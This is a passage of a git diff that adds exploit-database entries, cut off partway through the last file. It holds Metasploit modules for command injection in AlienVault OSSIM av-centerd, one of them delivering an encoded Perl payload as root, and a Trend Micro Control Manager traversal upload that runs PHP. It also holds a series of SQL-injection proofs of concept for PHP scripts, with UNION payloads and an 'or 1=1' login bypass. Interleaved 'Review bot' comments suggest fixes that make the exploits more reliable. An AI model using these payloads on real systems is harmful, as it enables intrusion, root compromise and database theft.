+ my $package = system ( "curl --proxy-anyauth -K /etc/curlrc --max-time 20 --user-agent $user_agent_uuid --dump-header $header -o $deb http://data.alienvault.com/avl/$license_type/?license=$license_encoded" );
+ $SIG{CHLD} = 'IGNORE';
+
+ my @out = q{};
+
+ if ( !-e $header || -z $header ) {
+ @out = ( '1', 'Imposible to connect. Please check your network configuration' );
+ unlink $header;
+ return \@out;
+ }
+
+ if ( -e $deb ) {
+
+ open HEADERFILE, "< $header" or die "Not $!";
+ my @header_content = ;
+ close(HEADERFILE);
+ my $response_ok = 0;
+ foreach (@header_content) {
+
+ if ( $_ =~ / 200 OK/) {
+ $response_ok = 1;
+ }
+ }
+ if ( $response_ok == 0 ) {
+ @out = ( '1', 'Imposible to connect. Please check your network configuration' );
+ unlink $header;
+ unlink $deb;
+ return \@out;
+ }
+
+
+ $SIG{CHLD} = 'DEFAULT';
+ my $command = "/usr/bin/dpkg -i --force-confnew $deb";
+ verbose_log_file ("LICENSE $license_type: $command");
+ my $result = qx{$command};
+ $SIG{CHLD} = 'IGNORE';
+ $result >>= 8 ;
+ if ( $result == 0 ) {
+ verbose_log_file ("LICENSE $license_type: SUCCESS. Installed");
+ unlink $deb;
+ unlink $header;
+ @out = ( '0', 'SUCCESS. Installed' );
+ return \@out;
+ }
+ else
+ {
+ verbose_log_file ("LICENSE $license_type: ERROR. Install failed");
+ @out = ( '2', 'ERROR. Install failed' );
+ unlink $deb;
+ unlink $header;
+ return \@out;
+ }
+ }
+ else
+ {
+ my $error_msg;
+ verbose_log_file ("LICENSE $license_type: ERROR MSG");
+ open LFILE, "< $header" or die "Not $!";
+ my @header_msg = ;
+ close(LFILE);
+ foreach(@header_msg){
+ verbose_log_file ($_);
+ if ($_ =~ m/X-AV-ERROR/)
+ {
+ $error_msg = $_;
+ }
+ }
+ unlink $header;
+
+ @out = ( '2', substr($error_msg, 12, -1)); # Remove 'X-AV-ERROR: 'and \n
+ return \@out;
+ }
+}
+
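Review bot: `check` at L595 calls `send_soap_request("get_dpkg")` with one argument, but the method is declared at L659 as `def send_soap_request(method, timeout=20, action)` with a required trailing parameter, so Ruby raises ArgumentError (given 1, expected 2..3) before any request is sent; even when an action is supplied, any value other than 'disable'/'pop_shell' leaves `soap` nil. Reordering to `def send_soap_request(method, action = nil, timeout = 20)`, updating the two calls at L681 and L684 to pass the action before the timeout, and giving the `if` chain an `else` branch that builds a plain request resolves this. The version test `version >= "4.7.0"` at L606 is a lexicographic string comparison (`"4.10.0" >= "4.7.0"` is false), so `Gem::Version.new(version) >= Gem::Version.new("4.7.0")` is the robust form; 42709.rb repeats the same comparison at L1004.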
diff --git a/platforms/linux/remote/42708.rb b/platforms/linux/remote/42708.rb
new file mode 100755
index 000000000..94c7ed716
--- /dev/null
+++ b/platforms/linux/remote/42708.rb
@@ -0,0 +1,154 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability found within the sync_rserver
+ function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
+ during the parsing of the $uuid parameter. This allows for the escaping of a system
+ command allowing for arbitrary command execution as root
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2014-3804' ],
+ [ 'ZDI', '14-197' ],
+ [ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
+ ],
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Jun 11 2014')
+
+ register_options([
+ Opt::RPORT(40007),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
+ ], self.class)
+
+ end
+
+ def run
+
+ soap = "\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+ soap += "All\r\n"
+ soap += "& #{datastore['CMD']} \r\n"
+ soap += "#{datastore['RHOST']}\r\n"
+ soap += "#{Rex::Text.rand_text_alpha(4 + rand(4))}\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/av-centerd',
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => soap,
+ 'headers' => {
+ 'SOAPAction' => "\"AV/CC/Util#sync_rserver\""
+ }
+ }, 20)
+
+ if res && res.code == 200
+ print_good("Command executed successfully!")
+ else
+ print_bad("Something went wrong...")
+ end
+
+ end
+
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub sync_rserver
+{
+ my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
+ verbose_log_file(
+ "SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
+ );
+
+ if ($uuid =~ /[;`\$\<\>\|]/) {
+ console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
+ my @ret = ("Error");
+ return \@ret;
+ }
+
+ my $conn = Avtools::get_database();
+ my $sqlfile = "/tmp/sync_${uuid}.sql";
+ my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
+ my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
+ my $sqlfile_content;
+ my $status = 1;
+ my $counter = 0;
+ my @ret;
+ my $query = qq{};
+ my $dbq;
+
+ if ( -f $sqlfile_old )
+ {
+ my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
+ debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
+ if ( $sqlfile_md5 eq $sqlfile_old_md5 )
+ {
+ unlink $sqlfile;
+ verbose_log_file ("Already sync'ed!");
+ return "0";
+ }
+ else
+ {
+ unlink $sqlfile_old;
+ }
+ }
+
+ my $query_array = `ossim-db < $sqlfile 2>&1`;
+ $query_array =~ s/[\s\n]+$//g;
+ if ($query_array ne '')
+ {
+ $status = $query_array;
+ }
+ else
+ {
+ $status = 0;
+ }
+
+ if ( ! (defined $status) or $status == 0 )
+ {
+ if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
+ {
+ verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
+ system('/etc/init.d/ossim-server restart');
+ }
+ else
+ {
+ debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
+ }
+
+ $query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
+ debug_log_file($query);
+ $dbq = $conn->prepare($query);
+ $dbq->execute();
+ $dbq->finish();
+ }
+ else
+ {
+ verbose_log_file ("Error syncing rservers: ${status}");
+ }
+
+ debug_log_file("Move file: $sqlfile");
+ move ($sqlfile, $sqlfile . ".old");
+
+# push @ret, "0";
+ return "0";
+}
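Review bot: The `CMD` option at L814 is described as 'This is the file to download', a description carried over from the `FILE` option of 42695.rb (L447) that does not match what the option holds; `OptString.new('CMD', [ false, 'The OS command to execute', 'touch /tmp/file.txt'])` mirrors the wording 42698.rb uses at L328. `print_good("Command executed successfully!")` at L845 fires on any HTTP 200 without inspecting the body, and the Perl reproduced at L864-L868 returns an `Error` array for rejected input over what is likely the same 200 transport, so the message asserts more than the response proves; `print_status("Request accepted (HTTP 200); response body not verified")` is the accurate wording.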
diff --git a/platforms/linux/remote/42709.rb b/platforms/linux/remote/42709.rb
new file mode 100755
index 000000000..715b04266
--- /dev/null
+++ b/platforms/linux/remote/42709.rb
@@ -0,0 +1,171 @@
+require 'msf/core'
+require 'rexml/document'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include REXML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',
+ 'Description' => %q{
+ This module exploits a command injection flaw found in the get_log_line
+ function found within Util.pm. The vulnerability is triggered due to an
+ unsanitized $r_file parameter passed to a string which is then executed
+ by the system
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2014-3805' ],
+ [ 'OSVDB', '107992' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ },
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'RequiredCmd' => 'perl netcat-e openssl python gawk'
+ }
+ },
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ ['Alienvault <= 4.7.0',{}]
+ ],
+ 'DisclosureDate' => 'Jul 18 2014'))
+
+ register_options([Opt::RPORT(40007)], self.class)
+ end
+
+ def check
+ version = ""
+ res = send_soap_request("get_dpkg")
+
+ if res &&
+ res.code == 200 &&
+ res.headers['SOAPServer'] &&
+ res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+ res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+
+ version = $1
+ end
+
+ if version.empty? || version >= "4.7.0"
+ return Exploit::CheckCode::Safe
+ else
+ return Exploit::CheckCode::Appears
+ end
+ end
+
+ def build_soap_request(method)
+ xml = Document.new
+ xml.add_element(
+ "soap:Envelope",
+ {
+ "xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
+ "xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
+ "xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
+ "soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
+ "xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
+ })
+
+ body = xml.root.add_element("soap:Body")
+ m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
+
+ args = []
+ args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
+ args[0].text = "All"
+
+ args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
+ args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
+
+ args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
+ args[2].text = "#{datastore['RHOST']}"
+
+ args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
+ args[3].text = "#{rand_text_alpha(4 + rand(4))}"
+
+ args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
+ args[4].text = "/var/log/auth.log"
+
+ args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
+ perl_payload = "system(decode_base64"
+ perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+ args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"
+
+ xml.to_s
+ end
+
+ def send_soap_request(method, timeout=20)
+ soap = build_soap_request(method)
+
+ res = send_request_cgi({
+ 'uri' => '/av-centerd',
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => soap,
+ 'headers' => {
+ 'SOAPAction' => "\"AV/CC/Util##{method}\""
+ }
+ }, timeout)
+
+ res
+ end
+
+ def exploit
+ send_soap_request("get_log_line", 1)
+ end
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub get_log_line {
+ my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )
+ = @_;
+
+ verbose_log_file(
+ "GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
+ );
+
+ my @ret = ("$systemuuid");
+
+ if ( $r_file =~ /\.\./ ){
+ push(@ret,"File not auth");
+ return \@ret;
+ }
+
+ if ( $number_lines <= 0) {
+ push(@ret,"Error in number lines");
+ return \@ret;
+ }
+
+ if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){
+ if (! -f "$r_file" ){
+ push(@ret,"File not found");
+ return \@ret;
+ }
+ push(@ret,"ready");
+
+ my $command = "tail -$number_lines $r_file";
+ #push(@ret,"$command");
+ #my @content = `tail -$number_lines $r_file`;
+ my @content = `$command`;
+ push(@ret,@content);
+ return \@ret;
+ }
+ else {
+ push(@ret,"path not auth");
+ return \@ret;
+ }
+}
+
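Review bot: The version gate in `check` compares version strings lexicographically (`version >= "4.7.0"`), so a release such as "4.10.0" sorts below "4.7.0" and would be reported as Appears; compare parsed versions instead, e.g. `Gem::Version.new(version) >= Gem::Version.new('4.7.0')`. When fingerprinting fails (`res` nil, no SOAPServer header, no regex match) the method falls through to `Safe` although nothing about the target was established; returning `Exploit::CheckCode::Unknown` for the empty-version case would be the accurate result. The Description attributes the flaw to an unsanitized `$r_file`, yet the Util.pm source appended after `__END__` shows `$r_file` is prefix-checked and only numerically tested `$number_lines` reaches the shell command unchanged, and the module's sixth SOAP argument appears to land on that parameter; the Description should name `$number_lines` so anyone writing the defensive fix validates the right input.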
diff --git a/platforms/php/remote/42692.rb b/platforms/php/remote/42692.rb
new file mode 100755
index 000000000..3eb2e9d8c
--- /dev/null
+++ b/platforms/php/remote/42692.rb
@@ -0,0 +1,116 @@
+require 'msf/core'
+require 'msf/core/exploit/php_exe'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::PhpEXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Trend Micro Control Manager importFile Directory Traversal RCE',
+ 'Description' => %q{
+ This module exploits a directory traversal vulnerability found in Trend Micro
+ Control Manager. The vulnerability is triggered when sending a specially crafted
+ fileName (containing ../'s) parameter to the importFile.php script. This will allow
+ for writing outside of the ImportPolicy directory.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'ZDI', '17-060' ],
+ [ 'URL', 'https://success.trendmicro.com/solution/1116624' ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ },
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 07 2017'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to TMCM', '/webapp']),
+ OptBool.new('SSL', [ true, 'Use SSL', true]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def exploit
+ require 'securerandom'
+
+ uri = target_uri.path
+ uri << '/' if uri[-1,1] != '/'
+
+ boundary = SecureRandom.hex
+ payload_name = "#{rand_text_alpha(5)}.php"
+ print_status("Uploading #{payload_name} to the server...")
+
+ cookies = "ASP_NET_SessionId=55hjl0burcvx21uslfxjbabs; "
+ cookies << "wf_cookie_path=%2F; WFINFOR=#{rand_text_alpha(10)}; "
+ cookies << "PHPSESSID=fc4o2lg5fpgognc28sjcitugj1; "
+ cookies << "wf_CSRF_token=bd52b54ced23d3dc257984f68c39d34b; "
+ cookies << "un=a8cad04472597b0c1163743109dad8f1; userID=1; "
+ cookies << "LANG=en_US; "
+ cookies << "wids=modTmcmCriticalEvents%2CmodTmcmUserThreatDetection%2CmodTmcmAppStatusSrv%2CmodTmcmTopThreats%2CmodTmcmEndpointThreatDetection%2CmodTmcmCompCompliance%2C; "
+ cookies << "lastID=65; cname=mainConsole; theme=default; lastTab=-1"
+
+ post_body = []
+ post_body << "--#{boundary}\r\n"
+ post_body << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
+ post_body << "importPolicy\r\n"
+ post_body << "--#{boundary}\r\n"
+ post_body << "Content-Disposition: form-data; name=\"fileSize\"\r\n\r\n"
+ post_body << "2097152\r\n"
+ post_body << "--#{boundary}\r\n"
+ post_body << "Content-Disposition: form-data; name=\"fileName\"\r\n\r\n"
+ post_body << "../../../widget_60_2899/repository/db/sqlite/#{payload_name}\r\n"
+ post_body << "--#{boundary}\r\n"
+ post_body << "Content-Disposition: form-data; name=\"filename\";\r\n"
+ post_body << "filename=\"policy.cmpolicy\"\r\n"
+ post_body << "Content-Type: application/octet-stream\r\n\r\n"
+ post_body << "\r\n\r\n"
+ post_body << "--#{boundary}--\r\n"
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("#{uri}", "widget", "repository", "widgetPool", "wp1", "widgetBase", "modTMCM", "inc", "importFile.php"),
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => post_body.join,
+ 'headers' => {
+ 'Cookie' => cookies,
+ 'Accept-Encoding' => "gzip;q=1.0,deflate;q=0.6,identity;q=0.3",
+ 'Connection' => "close",
+ 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+ 'Accept-Language' => "en-US,en;q=0.5",
+ },
+ })
+
+ if res.body =~ /Import Successfully/
+ print_good("#{payload_name} uploaded successfully!")
+ print_status("Attempting to execute payload...")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("#{uri}", "widget_60_2899", "repository", "db", "sqlite", "#{payload_name}"),
+ 'headesr' => {
+ 'Cookie' => cookies
+ }
+ })
+
+ else
+ print_error("Something went wrong...")
+ end
+
+ end
+end
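Review bot: `res.body =~ /Import Successfully/` dereferences `res` without a nil check, and `send_request_cgi` returns nil on connection failure or timeout, so an unreachable host raises NoMethodError instead of a clean module failure; add `fail_with(Failure::Unreachable, 'Connection failed') unless res` before the match. The module includes `Msf::Exploit::FileDropper` but never calls `register_file_for_cleanup`, so the include is dead weight and should be used or removed. On the second request the options key is misspelled `'headesr'`, so that hash is silently ignored by `send_request_cgi`, which reads `'headers'`. The `'Version' => '$Revision: $'` entry is leftover SVN-era metadata that current modules omit and can be dropped.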
diff --git a/platforms/php/webapps/42667.txt b/platforms/php/webapps/42667.txt
new file mode 100755
index 000000000..127956a7a
--- /dev/null
+++ b/platforms/php/webapps/42667.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Unique Low Bid Auction Script 3.3 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/unique-low-bid-auction-script.htm
+# Demo: http://www.icloudcenter.net/demos/iclowbidauction/
+# Version: 3.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
+
+# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42668.txt b/platforms/php/webapps/42668.txt
new file mode 100755
index 000000000..abe75f8d8
--- /dev/null
+++ b/platforms/php/webapps/42668.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: MLM Software Script 2.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/mlm-script.htm
+# Demo: http://www.icloudcenter.net/demos/icmlm/
+# Version: 2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# '+/*!00007uNiOn*/+/*!00007SelEct*/+0x283129,0x283229,0x3c68313e496873616e2053656e63616e3c2f68313e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42669.txt b/platforms/php/webapps/42669.txt
new file mode 100755
index 000000000..02b751e1d
--- /dev/null
+++ b/platforms/php/webapps/42669.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Hotel Reservation Site Script 3.3 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/hotel-reservation-site-script.htm
+# Demo: http://icloudcenter.net/demos/ichotelreservation/
+# Version: 3.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42670.txt b/platforms/php/webapps/42670.txt
new file mode 100755
index 000000000..8b6808df6
--- /dev/null
+++ b/platforms/php/webapps/42670.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: eBay like Auction PHP Script 2.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/ebay-like-auction-script.htm
+# Demo: http://icloudcenter.net/demos/icauction/
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/item.php?id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42671.txt b/platforms/php/webapps/42671.txt
new file mode 100755
index 000000000..a2d3a4a24
--- /dev/null
+++ b/platforms/php/webapps/42671.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Doctor Appointment Script 1.3 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/doctor-appointment-script.htm
+# Demo: http://icloudcenter.net/demos/icdoctorappointment/
+# Version: 1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42672.txt b/platforms/php/webapps/42672.txt
new file mode 100755
index 000000000..52baa8e6b
--- /dev/null
+++ b/platforms/php/webapps/42672.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Restaurant Site Script 1.4 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/restaurant-site-script.htm
+# Demo: http://icloudcenter.net/demos/icrestaurant/
+# Version: 1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42673.txt b/platforms/php/webapps/42673.txt
new file mode 100755
index 000000000..74badf9e4
--- /dev/null
+++ b/platforms/php/webapps/42673.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Dutch Auction Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/dutch-auction-script.htm
+# Demo: http://icloudcenter.net/demos/icdutchauction/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
+
+# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42674.txt b/platforms/php/webapps/42674.txt
new file mode 100755
index 000000000..95b3a2f17
--- /dev/null
+++ b/platforms/php/webapps/42674.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Auto Dealer Car Sales PHP Script 2.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/auto-dealer-car-sales-script.htm
+# Demo: http://icloudcenter.net/demos/icautosales/
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?cmd=do_car_search&type=7&mod_id=[SQL]
+#
+# http://localhost/[PATH]/index.php?cmd=advertise_details&category=car&aid=[SQL]
+#
+# http://localhost/[PATH]/index.php?cmd=directory&parent=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42675.txt b/platforms/php/webapps/42675.txt
new file mode 100755
index 000000000..ec98c642e
--- /dev/null
+++ b/platforms/php/webapps/42675.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Travel Site Script 2.2 - Authentication Bypass
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/traveling-website-script.htm
+# Demo: http://icloudcenter.net/demos/ICPenny/
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42676.txt b/platforms/php/webapps/42676.txt
new file mode 100755
index 000000000..dd3a1f4fc
--- /dev/null
+++ b/platforms/php/webapps/42676.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Classifieds Software Script Like Craigslist 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/craigslist-like-classifieds-script.htm
+# Demo: http://icloudcenter.net/demos/icclassifieds/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/post_details.php?city=0&id=[SQL]
+#
+# -3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,(/*!00004select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00004table_name*/,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)),0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137--+-
+#
+# http://localhost/[PATH]/view_posts.php?city=[SQL]
+#
+# http://localhost/[PATH]/index.php?c=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42677.txt b/platforms/php/webapps/42677.txt
new file mode 100755
index 000000000..a52346313
--- /dev/null
+++ b/platforms/php/webapps/42677.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Students Course Assessment Test Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/student-course-assessment-test-script.htm
+# Demo: http://icloudcenter.net/demos/icstudents/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
